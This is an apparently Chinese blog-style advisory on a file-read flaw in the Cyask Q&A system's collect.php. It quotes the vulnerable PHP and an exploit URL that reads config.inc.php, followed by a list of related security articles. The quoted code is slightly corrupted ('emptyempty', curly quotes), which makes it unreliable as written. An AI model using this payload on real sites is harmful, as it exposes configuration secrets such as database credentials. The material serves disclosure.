怎么解决php中的越权访问,cyask知道系统collect.php页面存在越权漏洞

最新推荐文章于 2023-05-06 16:48:24 发布
最新推荐文章于 2023-05-06 16:48:24 发布
阅读量160 收藏
点赞数
文章标签: 怎么解决php中的越权访问

影响版本:

Cyask

程序介绍:

Cyask国内较为多人使用的仿百度风格的Ask系统。

漏洞分析:

从Collect.php代码当中可以看到

else

{

/*

检查网址

*/

$url=get_referer();

$neturl=emptyempty($_POST['neturl']) ? trim($_GET['neturl']) : trim($_POST['neturl']);

$collect_url=emptyempty($neturl) ? $url : $neturl;

$contents = ”;

if($fid=@fopen($collect_url,”r“))

{

do

{

$data = fread($fid, 4096);

if (strlen($data) == 0)

{

break;

}

$contents .= $data;

}

while(true);

fclose($fid);

}

else

{

show_message(’collect_url_error’, ”);

exit;

}

漏洞利用:

http://www.target.com/collect.php?neturl=config.inc.php

解决方案:

厂商补丁:

cyask

-------

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载

weixin_39732249
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
怎么解决php越权访问,WEB安全系列之《如何挖掘越权漏洞
weixin_34170028的博客
03-16 450
0x01 前言我作为一个彩笔,很荣幸成为签约作家团的一员,今天,就来讲讲越权,今天会举三个例子,一个代码审计,两个黑盒测试。0x02什么是越权越权漏洞是Web应用程序一种常见的安全漏洞。它的威胁在于一个账户即可控制全站用户数据。当然这些数据仅限于存在漏洞功能对应的数据。越权漏洞的成因主要是因为开发人员在对数据进行增、删、改、查询时对客户端请求的数据过分相信而遗漏了权限的判定。所以测试越权就...
基于PHP的iASK!智能问答系统(Cyask3.1整合安装包) GBK.zip
07-20
基于PHP的iASK!智能问答系统(Cyask3.1整合安装包) GBK.zip
cyask的一个本地读文件的漏洞利用
05-06 603
昨天在晚上看到了一个这样的文章,却没有人说利用的方法,自己研究了一下,原来这么简单。下面是这篇文章的内容。下午帮同事看一个站,DZ的论坛,该补的都补了,咱也没圈day然后逛了下有个仿百度知道的程序在上面,和DZ整合了,原以为也是Dz开发的,估计也没啥问题下来看代码,看到collect.php-------------------------------else{    /*    检查网址  
PHP代码审计 ----- 越权漏洞
qq_62344745的博客
05-06 234
水平越权,和,垂直越权 服务器端,对客户端提出的数据操作请求,太过信任,忽略了用户操作权限的判断,导致拥有了其它用户的增删改查这里id值 ,传过来,直接where 查询,并没有坐用户的验证 , 直接查id值,就可以看到不同用户的信息第一处越权,更改1.2. 如果是get传过来,值为art ,数据直接代入select ,抓包,改包,postid = 5 改为 postid=3 test02 修改了test01 的内容对某一数据进行增删改查时需要去校验下所操作的数据是否属
php防止权限越界,PHP 'cgi_main.c'越界读拒绝服务漏洞
weixin_42659194的博客
03-19 170
发布日期:2014-12-31更新日期:2015-01-04受影响系统PHP PHP < 5.6.4PHP PHP < 5.5.20PHP PHP < 5.4.36描述:BUGTRAQ ID: 71833CVE(CAN) ID: CVE-2014-9427PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTMLPHP 5.4.36之前版本、5.5.20之...
php 水平越权,水平越权与垂直越权
weixin_39875192的博客
04-12 381
越权漏洞越权访问(Broken Access Control,简称BAC)是Web应用程序一种常见的漏洞,由于其存在范围广、危害大,被OWASP列为Web应用十大安全隐患的第二名。该漏洞是指应用在检查授权时存在纰漏,使得攻击者在获得低权限用户账户后,利用一些方式绕过权限检查,访问或者操作其他用户或者更高权限。越权漏洞的成因主要是因为开发人员在对数据进行增、删、改、查询时对客户端请求的数据过分相信...
基于PHP的iASK!智能问答系统(Cyask3.1整合安装包)GBK源码.zip
08-27
基于PHP的iASK!智能问答系统(Cyask3.1整合安装包)GBK源码.zip
[论坛社区]CyAsk仿百度知道程序 v1.5 个人版_cyask1.5(test).zip源码PHP项目源代码下载
03-15
[论坛社区]CyAsk仿百度知道程序 v1.5 个人版_cyask1.5(test).zip源码PHP项目源代码下载[论坛社区]CyAsk仿百度知道程序 v1.5 个人版_cyask1.5(test).zip源码PHP项目源代码下载 1.适合个人搭建网站项目参考 2.适合学生...
[论坛社区]CyAsk v3.0 for phpwind(最强百度知道程序)_cyask3.0forphpwind.rar
01-11
系统功能完善、界面美观、操作简单、功能齐全、管理便捷,具有很高的实际应用价值。 项目都经过严格调试,确保可以运行! 1. 技术组成 前端:Vue/JSP/React/HTML+JS+CSS/ASP 后台框架代码:java/c/c++/...
[论坛社区]CyAsk仿百度知道程序 v1.5 个人版_cyask1.5(test).rar
最新发布
01-11
系统功能完善、界面美观、操作简单、功能齐全、管理便捷,具有很高的实际应用价值。 项目都经过严格调试,确保可以运行! 1. 技术组成 前端:Vue/JSP/React/HTML+JS+CSS/ASP 后台框架代码:java/c/c++/...
php 越权 漏洞,PHPYUN最新版SQL注入及多处越权操作终结篇
weixin_35098081的博客
03-10 755
### 简要描述:PHPYUN最新版(phpyun_v3.1.0604_gbk)SQL注入及多处越权操作虽然PHPYUN在注入防御上已经做得很不错了,方的很严格,像吃掉引号,宽字节的基本上很少了,但是不需要跟引号斗争的地方还有很多,得好好检查,好好修复了!!!越权方面做的也很不错了,有些是因为SQL注入引起,有些是你们忘了加thins->uid的限制,这里再来一处前台SQL注入及多处越权操作...
php越权执行命令漏洞_PHP漏洞挖掘思路+实例 第二章
weixin_33837846的博客
03-09 351
0x00 背景感谢各位的评论与讨论,经过研讨的地方在文章标出。补充之前第一篇文章思路,重新加入了最近发现的一些实例(也有部分来自wooyun上的牛人们已公开的漏洞漏洞归属原作者并均在文章内标明)在文章的测试条件下,我们的配置默认是这样子的:safe_mode = off (避免各种奇奇怪怪的失败);disabled_functions = N/A ( 可以使用全部函数,免得莫名其妙的不能用...
渗透测试越权访问问题解决(非正式)
mynameisjinxiaokai的博客
08-11 468
相对于垂直权限管理来说,水平权限问题出在同一角色上,系统只验证了能访问数据的角色,既没有对角色内的用户做细分,也没有对数据的子集做细分。在web应用,根据访问客体的不同,常见的访问控制可以分为“基于URL的访问控制”、“基于方法的访问控制”、“基于数据的访问控制”。最后,如果在系统上线后再来处理数据级访问控制的问题,可能会涉及到跨表,跨库查询,对系统的改动较大,同时也可能会影响到性能。2、在配置权限时,应当使用“最小权限原则”,并使用“默认拒绝”的策略,只对有需要的主体单独配置“允许”的策略。...
越权访问漏洞总结
黑面狐
07-28 1万+
一、平行越权 攻击者请求操作(增删改查)某条数据时,web应用程序没有判断该条数据的所属人,或者在判断数据所属人时直接从用户提交的表单参数获取,例如用户id等,导致攻击者可以自行修改参数,操作获取不属于自己的数据。 测试方法:在发送请求时观察请求参数,尝试修改用户id或者其他参数验证是否能查看不属于自己的数据,进行增删改查,若成功则存在平行越权漏洞。   二、纵向越权 和平行越权相似...
越权漏洞系列
热门推荐
Websec
04-02 4万+
0x01:越权的定义越权漏洞是我们在测试过程遇到比较多的漏洞,我们可以这样来理解越权漏洞,一个用户A一般只能够对自己本身的信息进行增删改查,然而由于后台开发人员的疏忽,没有在信息进行增删改查时候进行用户判断,从而导致用户A可以对其他用户进行增删改查等等操作。当然越权漏洞的话,分为水平越权和垂直越权。0x01:水平越权:也可以把其称作访问控制攻击漏洞.Web应用程序在接收到用户的请求时,我们在增删...
web的越权访问的处理(步骤详解)
赏樱看雪撸代码
07-04 1万+
用户越权访问的处理 一般来说,越权放问就好比你是非系统管理员用户,却偷偷的跑进了系统管理菜单,僭越权访问里面的信息甚至修改其的数据(不同级别的越权又称垂直越权访问),因此对数据的安全性造成极大的威胁,是故每家企业都有其方法来保证企业内部数据的安全性,也就是解决越权访问的问题。 有关改业务处理主要考虑下面两个方面: url的越权访问和接口方法的越权访问 通过角色用户来判断是否越权访...
越权漏洞简单分析
学者博客
10-26 1万+
一、原理        越权漏洞是Web应用程序一种常见的安全漏洞。它的威胁在于一个账户即可控制全站用户数据。当然这些数据仅限于存在漏洞功能对应的数据。越权漏洞的成因主要是因为开发人员在对数据进行增、删、改、查询时对客户端请求的数据过分相信而遗漏了权限的判定。 二、分类 主要分为水平越权和垂直越权,简单了解一下这两者的区别: 水平越权:指攻击者尝试访问与他拥有相同权限的用户资源。例如有一...
网站安全检测服务之PHP代码的后台绕过登录漏洞
网站安全专家
06-06 7766
针对于PHP代码的开发的网站,最近在给客户做网站安全检测的同时,大大小小的都会存在网站的后台管理页面被绕过并直接登录后台的漏洞,而且每个网站的后台被绕过的方式都不一样,根据SINE安全渗透测试多年来经验,来总结一下网站后台绕过的一些详情,以及该如何去防范后台被绕过,做好网站的安全部署。  后台验证码缺乏安全验证  比如在axublog程序,网站后台存在一个验证管理员登录的一个函数chkadcoo...
phpf防止越权下载文件
weixin_30443747的博客
02-25 334
if (file_exists($sFilePath)) { $sTitle = $sFilePath; $sTitle = strrchr($sTitle, "/"); $sTitle = ltrim($sTitle, '/'); $this->downloadFile($sTi...
页面添加Token防止越权访问
沉下心来,戒骄戒躁
04-08 1万+
源码很简单。 1、首先是在访问JSP的时候生成一个随机数,放入session。同时会在服务器缓存一份Token。 2、当form到后台后,调用工具类验证Token。会在TokenList验证是有该Token值,如果有则验证通过,同时删除List的Token。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值